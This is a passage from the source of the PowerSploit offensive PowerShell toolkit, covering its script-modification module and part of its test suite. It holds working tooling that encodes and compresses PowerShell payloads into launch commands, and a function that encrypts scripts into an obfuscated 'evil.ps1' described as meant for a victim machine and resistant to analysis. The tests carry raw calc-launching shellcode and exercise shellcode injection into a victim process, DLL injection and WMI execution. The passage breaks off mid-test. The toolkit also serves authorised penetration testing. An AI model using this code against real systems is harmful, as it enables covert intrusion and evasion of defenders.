$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + \"'$EncodedCompressedScript'\" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'\r\n\r\n    # Base-64 strings passed to -EncodedCommand must be unicode encoded.\r\n    $UnicodeEncoder = New-Object System.Text.UnicodeEncoding\r\n    $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))\r\n\r\n    # Build the command line options\r\n    # Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.\r\n    $CommandlineOptions = New-Object String[](0)\r\n    if ($PSBoundParameters['NoExit'])\r\n    { $CommandlineOptions += '-NoE' }\r\n    if ($PSBoundParameters['NoProfile'])\r\n    { $CommandlineOptions += '-NoP' }\r\n    if ($PSBoundParameters['NonInteractive'])\r\n    { $CommandlineOptions += '-NonI' }\r\n    if ($PSBoundParameters['WindowStyle'])\r\n    { $CommandlineOptions += \"-W $($PSBoundParameters['WindowStyle'])\" }\r\n\r\n    $CmdMaxLength = 8190\r\n\r\n    # Build up the full command-line string. Default to outputting a fully base-64 encoded command.\r\n    # If the fully base-64 encoded output exceeds the cmd.exe character limit, fall back to partial\r\n    # base-64 encoding to save space. Thanks @Carlos_Perez for the idea.\r\n    if ($PSBoundParameters['Wow64'])\r\n    {\r\n        $CommandLineOutput = \"$($Env:windir)\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe $($CommandlineOptions -join ' ') -C `\"$NewScript`\"\"\r\n\r\n        if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)\r\n        {\r\n            $CommandLineOutput = \"$($Env:windir)\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe $($CommandlineOptions -join ' ') -E `\"$EncodedPayloadScript`\"\"\r\n        }\r\n\r\n        if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))\r\n        {\r\n            $CommandLineOutput = \"$($Env:windir)\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe $($CommandlineOptions -join ' ') -C `\"$NewScript`\"\"\r\n        }\r\n    }\r\n    else\r\n    {\r\n        $CommandLineOutput = \"powershell $($CommandlineOptions -join ' ') -C `\"$NewScript`\"\"\r\n\r\n        if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)\r\n        {\r\n            $CommandLineOutput = \"powershell $($CommandlineOptions -join ' ') -E `\"$EncodedPayloadScript`\"\"\r\n        }\r\n\r\n        if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))\r\n        {\r\n            $CommandLineOutput = \"powershell $($CommandlineOptions -join ' ') -C `\"$NewScript`\"\"\r\n        }\r\n    }\r\n\r\n    if ($CommandLineOutput.Length -gt $CmdMaxLength)\r\n    {\r\n            Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'\r\n    }\r\n\r\n    Write-Output $CommandLineOutput\r\n}\r\n"
  },
  {
    "path": "ScriptModification/Out-EncryptedScript.ps1",
    "content": "function Out-EncryptedScript\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nEncrypts text files/scripts.\r\n\r\nPowerSploit Function: Out-EncryptedScript  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nOut-EncryptedScript will encrypt a script (or any text file for that\r\nmatter) and output the results to a minimally obfuscated script -\r\nevil.ps1 by default.\r\n\r\n.PARAMETER ScriptPath\r\n\r\nPath to this script\r\n\r\n.PARAMETER Password\r\n\r\nPassword to encrypt/decrypt the script\r\n\r\n.PARAMETER Salt\r\n\r\nSalt value for encryption/decryption. This can be any string value.\r\n\r\n.PARAMETER InitializationVector\r\n\r\nSpecifies a 16-character the initialization vector to be used. This\r\nis randomly generated by default.\r\n\r\n.EXAMPLE\r\n\r\n$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nOut-EncryptedScript .\\Naughty-Script.ps1 $Password salty\r\n\r\nDescription\r\n-----------\r\nEncrypt the contents of this file with a password and salt. This will\r\nmake analysis of the script impossible without the correct password\r\nand salt combination. This command will generate evil.ps1 that can\r\ndropped onto the victim machine. It only consists of a decryption\r\nfunction 'de' and the base64-encoded ciphertext.\r\n\r\n.EXAMPLE\r\n\r\n[String] $cmd = Get-Content .\\evil.ps1\r\nInvoke-Expression $cmd\r\n$decrypted = de password salt\r\nInvoke-Expression $decrypted\r\n\r\nDescription\r\n-----------\r\nThis series of instructions assumes you've already encrypted a script\r\nand named it evil.ps1. The contents are then decrypted and the\r\nunencrypted script is called via Invoke-Expression\r\n\r\n.NOTES\r\n\r\nThis command can be used to encrypt any text-based file/script\r\n#>\r\n\r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\r\n    [CmdletBinding()]\r\n    Param (\r\n        [Parameter(Position = 0, Mandatory = $True)]\r\n        [String]\r\n        $ScriptPath,\r\n\r\n        [Parameter(Position = 1, Mandatory = $True)]\r\n        [Security.SecureString]\r\n        $Password,\r\n\r\n        [Parameter(Position = 2, Mandatory = $True)]\r\n        [String]\r\n        $Salt,\r\n\r\n        [Parameter(Position = 3)]\r\n        [ValidateLength(16, 16)]\r\n        [String]\r\n        $InitializationVector = ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join ''),\r\n\r\n        [Parameter(Position = 4)]\r\n        [String]\r\n        $FilePath = '.\\evil.ps1'\r\n    )\r\n\r\n    $TempCred = New-Object System.Management.Automation.PSCredential('a', $Password)\r\n    $PlaintextPassword = $TempCred.GetNetworkCredential().Password\r\n\r\n    $AsciiEncoder = New-Object System.Text.ASCIIEncoding\r\n    $ivBytes = $AsciiEncoder.GetBytes($InitializationVector)\r\n    # While this can be used to encrypt any file, it's primarily designed to encrypt itself.\r\n    [Byte[]] $scriptBytes = Get-Content -Encoding Byte -ReadCount 0 -Path $ScriptPath\r\n    $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($PlaintextPassword, $AsciiEncoder.GetBytes($Salt), \"SHA1\", 2)\r\n    $Key = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider\r\n    $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC\r\n    [Byte[]] $KeyBytes = $DerivedPass.GetBytes(16)\r\n    $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes)\r\n    $MemStream = New-Object System.IO.MemoryStream\r\n    $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)\r\n    $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length)\r\n    $CryptoStream.FlushFinalBlock()\r\n    $CipherTextBytes = $MemStream.ToArray()\r\n    $MemStream.Close()\r\n    $CryptoStream.Close()\r\n    $Key.Clear()\r\n    $Cipher = [Convert]::ToBase64String($CipherTextBytes)\r\n\r\n# Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function\r\n$Output = @\"\r\nfunction de([String] `$b, [String] `$c)\r\n{\r\n`$a = \"$Cipher\";\r\n`$encoding = New-Object System.Text.ASCIIEncoding;\r\n`$dd = `$encoding.GetBytes(\"$InitializationVector\");\r\n`$aa = [Convert]::FromBase64String(`$a);\r\n`$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes(`$b, `$encoding.GetBytes(`$c), \"SHA1\", 2);\r\n[Byte[]] `$e = `$derivedPass.GetBytes(16);\r\n`$f = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;\r\n`$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;\r\n[Byte[]] `$h = New-Object Byte[](`$aa.Length);\r\n`$g = `$f.CreateDecryptor(`$e, `$dd);\r\n`$i = New-Object System.IO.MemoryStream(`$aa, `$True);\r\n`$j = New-Object System.Security.Cryptography.CryptoStream(`$i, `$g, [System.Security.Cryptography.CryptoStreamMode]::Read);\r\n`$r = `$j.Read(`$h, 0, `$h.Length);\r\n`$i.Close();\r\n`$j.Close();\r\n`$f.Clear();\r\nif ((`$h.Length -gt 3) -and (`$h[0] -eq 0xEF) -and (`$h[1] -eq 0xBB) -and (`$h[2] -eq 0xBF)) { `$h = `$h[3..(`$h.Length-1)]; }\r\nreturn `$encoding.GetString(`$h).TrimEnd([Char] 0);\r\n}\r\n\"@\r\n\r\n    # Output decrypt function and ciphertext to evil.ps1\r\n    Out-File -InputObject $Output -Encoding ASCII $FilePath\r\n\r\n    Write-Verbose \"Encrypted PS1 file saved to: $(Resolve-Path $FilePath)\"\r\n}\r\n"
  },
  {
    "path": "ScriptModification/Remove-Comment.ps1",
    "content": "function Remove-Comment\r\n{\r\n<#\r\n.SYNOPSIS\r\n\r\nStrips comments and extra whitespace from a script.\r\n\r\nPowerSploit Function: Remove-Comment  \r\nAuthor: Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None  \r\nOptional Dependencies: None  \r\n\r\n.DESCRIPTION\r\n\r\nRemove-Comment strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.\r\n\r\nA major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee!\r\n\r\n.PARAMETER ScriptBlock\r\n\r\nSpecifies a scriptblock containing your script.\r\n\r\n.PARAMETER Path\r\n\r\nSpecifies the path to your script.\r\n\r\n.EXAMPLE\r\n\r\n$Stripped = Remove-Comment -Path .\\ScriptWithComments.ps1\r\n\r\n.EXAMPLE\r\n\r\nRemove-Comment -ScriptBlock {\r\n### This is my awesome script. My documentation is beyond reproach!\r\n      Write-Host 'Hello, World!' ### Write 'Hello, World' to the host\r\n### End script awesomeness\r\n}\r\n\r\nWrite-Host 'Hello, World!'\r\n\r\n.EXAMPLE\r\n\r\nRemove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand\r\n\r\nDescription\r\n-----------\r\nRemoves extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.\r\n\r\n.INPUTS\r\n\r\nSystem.String, System.Management.Automation.ScriptBlock\r\n\r\nAccepts either a string containing the path to a script or a scriptblock.\r\n\r\n.OUTPUTS\r\n\r\nSystem.Management.Automation.ScriptBlock\r\n\r\nRemove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.\r\n\r\n.LINK\r\n\r\nhttp://www.exploit-monday.com\r\nhttp://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/\r\n#>\r\n    \r\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\r\n    [CmdletBinding( DefaultParameterSetName = 'FilePath' )]\r\n    Param (\r\n        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )]\r\n        [ValidateNotNullOrEmpty()]\r\n        [String]\r\n        $Path,\r\n\r\n        [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )]\r\n        [ValidateNotNullOrEmpty()]\r\n        [ScriptBlock]\r\n        $ScriptBlock\r\n    )\r\n\r\n    Set-StrictMode -Version 2\r\n\r\n    if ($PSBoundParameters['Path'])\r\n    {\r\n        Get-ChildItem $Path -ErrorAction Stop | Out-Null\r\n        $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path))\r\n        $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString)\r\n    }\r\n    else\r\n    {\r\n        # Convert the scriptblock to a string so that it can be referenced with array notation\r\n        $ScriptBlockString = $ScriptBlock.ToString()\r\n    }\r\n\r\n    # Tokenize the scriptblock and return all tokens except for comments\r\n    $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' }\r\n\r\n    $StringBuilder = New-Object Text.StringBuilder\r\n\r\n    # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script.\r\n    $CurrentColumn = 1\r\n    $NewlineCount = 0\r\n    foreach($CurrentToken in $Tokens)\r\n    {\r\n        # Now output the token\r\n        if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation'))\r\n        {\r\n            $CurrentColumn = 1\r\n            # Only insert a single newline. Sequential newlines are ignored in order to save space.\r\n            if ($NewlineCount -eq 0)\r\n            {\r\n                $StringBuilder.AppendLine() | Out-Null\r\n            }\r\n            $NewlineCount++\r\n        }\r\n        else\r\n        {\r\n            $NewlineCount = 0\r\n\r\n            # Do any indenting\r\n            if($CurrentColumn -lt $CurrentToken.StartColumn)\r\n            {\r\n                # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored.\r\n                if ($CurrentColumn -ne 1)\r\n                {\r\n                    $StringBuilder.Append(' ') | Out-Null\r\n                }\r\n            }\r\n\r\n            # See where the token ends\r\n            $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1\r\n\r\n            # Handle the line numbering for multi-line strings\r\n            if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine))\r\n            {\r\n                $LineCounter = $CurrentToken.StartLine\r\n                $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n')\r\n\r\n                foreach($StringLine in $StringLines)\r\n                {\r\n                    $StringBuilder.Append($StringLine) | Out-Null\r\n                    $LineCounter++\r\n                }\r\n            }\r\n            # Write out a regular token\r\n            else\r\n            {\r\n                $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null\r\n            }\r\n\r\n            # Update our position in the column\r\n            $CurrentColumn = $CurrentToken.EndColumn\r\n        }\r\n    }\r\n\r\n    Write-Output ([ScriptBlock]::Create($StringBuilder.ToString()))\r\n}\r\n"
  },
  {
    "path": "ScriptModification/ScriptModification.psd1",
    "content": "@{\r\n\r\n# Script module or binary module file associated with this manifest.\r\nModuleToProcess = 'ScriptModification.psm1'\r\n\r\n# Version number of this module.\r\nModuleVersion = '3.0.0.0'\r\n\r\n# ID used to uniquely identify this module\r\nGUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'\r\n\r\n# Author of this module\r\nAuthor = 'Matthew Graeber'\r\n\r\n# Copyright statement for this module\r\nCopyright = 'BSD 3-Clause'\r\n\r\n# Description of the functionality provided by this module\r\nDescription = 'PowerSploit Script Preparation/Modification Module'\r\n\r\n# Minimum version of the Windows PowerShell engine required by this module\r\nPowerShellVersion = '2.0'\r\n\r\n# Functions to export from this module\r\nFunctionsToExport = '*'\r\n\r\n# List of all files packaged with this module\r\nFileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', \r\n               'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md'\r\n\r\n}\r\n"
  },
  {
    "path": "ScriptModification/ScriptModification.psm1",
    "content": "Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}\n"
  },
  {
    "path": "ScriptModification/Usage.md",
    "content": "To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.\r\n\r\nThe default per-user module path is: \"$Env:HomeDrive$Env:HOMEPATH\\Documents\\WindowsPowerShell\\Modules\"\r\nThe default computer-level module path is: \"$Env:windir\\System32\\WindowsPowerShell\\v1.0\\Modules\"\r\n\r\nTo use the module, type `Import-Module ScriptModification`\r\n\r\nTo see the commands imported, type `Get-Command -Module ScriptModification`\r\n\r\nFor help on each individual command, Get-Help is your friend.\r\n\r\nNote: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability."
  },
  {
    "path": "Tests/CodeExecution.tests.ps1",
    "content": "Set-StrictMode -Version Latest\n\n$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent\n$ModuleRoot = Resolve-Path \"$TestScriptRoot\\..\"\n$ModuleManifest = \"$ModuleRoot\\CodeExecution\\CodeExecution.psd1\"\n\nRemove-Module [C]odeExecution\nImport-Module $ModuleManifest -Force -ErrorAction Stop\n\nDescribe 'Invoke-Shellcode' {\n\t# 32-bit calc popping shellcode\n\t[Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,\n\t\t\t\t\t\t\t\t0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,\n\t\t\t\t\t\t\t\t0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,\n\t\t\t\t\t\t\t\t0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,\n\t\t\t\t\t\t\t\t0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,\n\t\t\t\t\t\t\t\t0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,\n\t\t\t\t\t\t\t\t0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\n\t\t\t\t\t\t\t\t0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,\n\t\t\t\t\t\t\t\t0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,\n\t\t\t\t\t\t\t\t0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,\n\t\t\t\t\t\t\t\t0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,\n\t\t\t\t\t\t\t\t0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,\n\t\t\t\t\t\t\t\t0x61,0x6c,0x63,0x00)\n\n\t# 64-bit calc popping shellcode\n\t[Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,\n\t\t\t\t\t\t\t\t0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,\n\t\t\t\t\t\t\t\t0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,\n\t\t\t\t\t\t\t\t0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,\n\t\t\t\t\t\t\t\t0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,\n\t\t\t\t\t\t\t\t0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,\n\t\t\t\t\t\t\t\t0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,\n\t\t\t\t\t\t\t\t0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,\n\t\t\t\t\t\t\t\t0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,\n\t\t\t\t\t\t\t\t0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,\n\t\t\t\t\t\t\t\t0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,\n\t\t\t\t\t\t\t\t0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,\n\t\t\t\t\t\t\t\t0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,\n\t\t\t\t\t\t\t\t0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,\n\t\t\t\t\t\t\t\t0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,\n\t\t\t\t\t\t\t\t0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,\n\t\t\t\t\t\t\t\t0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)\n\n\t$PowerShell32bit = $False\n\t$Shellcode = $Shellcode64\n\n\tif ([IntPtr]::Size -eq 4) {\n\t\t$PowerShell32bit = $True\n\t\t$Shellcode = $Shellcode32\n\t}\n\n\t$64BitOS = $False\n\tif ($Env:ProgramW6432) { $64BitOS = $True }\n\n\t# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe\n\tif ($PowerShell32bit -and $64BitOS) {\n\t\t# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad\n\t\t$NotepadPath = \"$($Env:SystemRoot)\\SysWow64\\notepad.exe\"\n\t} else {\n\t\t$NotepadPath = \"$($Env:SystemRoot)\\System32\\notepad.exe\"\n\t}\n\n\tBeforeEach {\n\t\t# Kill all running instances of calc.exe or Calculator.exe (i.e. \"modern\" calc)\n\t\tGet-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' } | Stop-Process -Force\n\t}\n\n\tIt 'should pop calc without arguments' {\n\t\tInvoke-Shellcode -Force\n\n\t\tStart-Sleep -Seconds 2\n\t}\n\n\tIt 'should pop calc in host process with -Shellcode arg' {\n\t\tInvoke-Shellcode -Shellcode $Shellcode -Force\n\n\t\tStart-Sleep -Seconds 2\n\t}\n\n\tIt 'should pop calc in victim notepad.exe process without -Shellcode arg' {\n\t\t$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath\n\n\t\tif ($NotepadProc.ReturnValue -ne 0) {\n\t\t\tthrow 'Could not start victim process: notepad.exe'\n\t\t} \n\n\t\t$VictimPID = $NotepadProc.ProcessId\n\n\t\tInvoke-Shellcode -ProcessId $VictimPID -Force\n\n\t\tStart-Sleep -Seconds 2\n\n\t\tStop-Process -Id $VictimPID\n\t}\n\n\tIt 'should pop calc in victim notepad.exe process with -Shellcode arg' {\n\t\t$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath\n\n\t\tif ($NotepadProc.ReturnValue -ne 0) {\n\t\t\tthrow 'Could not start victim process: notepad.exe'\n\t\t}\n\n\t\t$VictimPID = $NotepadProc.ProcessId\n\n\t\tInvoke-Shellcode -ProcessId $VictimPID -Shellcode $Shellcode -Force\n\n\t\tStart-Sleep -Seconds 2\n\n\t\tStop-Process -Id $VictimPID\n\t}\n\n\tAfterEach {\n\t\t# Validate that a calc process was launched by the shellcode\n\n\t\t$CalcProcs = Get-Process | Where-Object { $_.ProcessName -match '^[Cc]alc(ulator)?$' }\n\t\t$CalcCount = $CalcProcs | Measure-Object\n\n\t\tif ($CalcCount.Count -gt 0) {\n\t\t\t$CalcProcs | Stop-Process -Force\n\t\t}\n\n\t\t$CalcCount.Count | Should BeGreaterThan 0\n\t}\n}\n\nDescribe 'Invoke-DllInjection' {\n\t$Advpack = 'advpack.dll'\n\t$AdvpackPath = \"$($Env:SystemRoot)\\System32\\$Advpack\"\n\n\tIt 'should inject a known system DLL' {\n\t\tif (-not (Test-Path $AdvpackPath)) {\n\t\t\tthrow \"$AdvpackPath does not exist on disk.\"\n\t\t}\n\t\t\n\t\t$LoadedModule = Invoke-DllInjection -ProcessID $PID -Dll $AdvpackPath\n\t\t$LoadedModule | Should Not BeNullOrEmpty\n\n\t\t$LoadedModule -is [System.Diagnostics.ProcessModule] | Should Be $True\n\t\t$LoadedModule.ModuleName | Should Be $Advpack\n\t}\n\n\tIt 'should not inject a non-existent DLL' {\n\t\t$NonExistentDllPath = 'C:\\foo.dll'\n\n\t\tTest-Path $NonExistentDllPath | Should Be $False\n\n\t\t{ Invoke-DllInjection -ProcessID $PID -Dll $NonExistentDllPath } | Should Throw\n\t}\n\n\tIt 'should not inject to a non-existent process' {\n\t\t{ Invoke-DllInjection -ProcessID 0 -Dll $AdvpackPath } | Should Throw\n\t}\n}\n\nDescribe 'Invoke-WmiCommand' {\n\t$RegistryHive = 'HKEY_CURRENT_USER'\n\t$KeyPath = 'SOFTWARE\\Microsoft\\Cryptography\\RNG'\n\t$RegistryKeyPath = \"HKCU:\\$KeyPath\"\n\t$RegistryPayloadValueName = 'Seed'\n\t$RegistryResultValueName = 'Value'\n\t$ComputerName = 'localhost'\n\t$SamplePayload = { 1+1 }\n\t$SamplePayloadResult = & $SamplePayload\n\t$SamplePayloadResultType = $SamplePayloadResult.GetType()\n\n\tContext 'Successful code execution' {\n\t\tBeforeEach {\n\t\t\t# Ensure registry keys and values are cleaned up prior to execution\n\t\t\tRemove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction SilentlyContinue\n\t\t\tRemove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction SilentlyContinue\n\t\t\tRemove-Item -Path $RegistryKeyPath -ErrorAction SilentlyContinue\n\t\t}\n\n\t\tAfterEach {\n\t\t\t{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryPayloadValueName -ErrorAction Stop } | Should Throw\n\t\t\t{ Remove-ItemProperty -Path $RegistryKeyPath -Name $RegistryResultValueName -ErrorAction Stop } | Should Throw\n\t\t\t{ Remove-Item -Path $RegistryKeyPath -ErrorAction Stop } | Should Throw\n\t\t}\n\n\t\tIt 'should execute a sample payload locally and clean up properly' {\n\t\t\t$Result = Invoke-WmiCommand -Payload $SamplePayload\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True\n\t\t\t$Result.PayloadOutput | Should Be $SamplePayloadResult\n\t\t\t$Result.PSComputerName | Should Be $ComputerName\n\t\t}\n\n\t\tIt 'should execute a sample payload \"remotely\" (localhost) and clean up properly' {\n\t\t\t$Result = Invoke-WmiCommand -Payload $SamplePayload -ComputerName $ComputerName\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True\n\t\t\t$Result.PayloadOutput | Should Be $SamplePayloadResult\n\t\t\t$Result.PSComputerName | Should Be $ComputerName\n\t\t}\n\n\t\tIt 'should execute a sample payload with explicit arguments locally and clean up properly' {\n\t\t\t$Result = Invoke-WmiCommand -Payload $SamplePayload -RegistryHive $RegistryHive -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName\n\t\t\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result.PayloadOutput -is $SamplePayloadResultType | Should Be $True\n\t\t\t$Result.PayloadOutput | Should Be $SamplePayloadResult\n\t\t\t$Result.PSComputerName | Should Be $ComputerName\n\t\t}\n\t}\n\n\tContext 'Invalid arguments' {\n\t\tIt 'should not process invalid registry hives' {\n\t\t\t{ Invoke-WmiCommand -Payload $SamplePayload -RegistryHive 'HKEY_FOO' -RegistryKeyPath $KeyPath -RegistryPayloadValueName $RegistryPayloadValueName -RegistryResultValueName $RegistryResultValueName } | Should Throw\n\t\t}\n\t}\n}\n\nDescribe 'Invoke-ReflectivePEInjection' {\n\t# A bare bones test harness DLL that simply returns L\"Hello, world!\" upon having WStringFunc called\n\t# See https://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/\n\t$Encoded64BitWStringDll = 